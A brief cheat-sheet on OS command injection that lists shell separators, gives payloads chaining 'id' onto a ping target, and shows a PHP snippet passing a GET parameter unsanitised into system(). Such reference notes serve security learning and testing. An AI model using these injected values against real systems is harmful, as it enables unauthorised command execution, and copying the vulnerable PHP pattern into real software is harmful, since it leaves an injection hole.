CMD Injection. Command Channing¶
Separators: | ; && || \n In http newline's hexadecimal value is 0x0A. Example of running commands split by newline:
ping 127.0.0.1
whoami
Payload example for ping:
127.0.0.1|id
127.0.0.1;id
127.0.0.1 && id
127.0.0.1 -unknown || id
$IP = $_GET['IP'];
echo "<pre>";
system("ping -c 5 ".$IP);
echo "</pre>";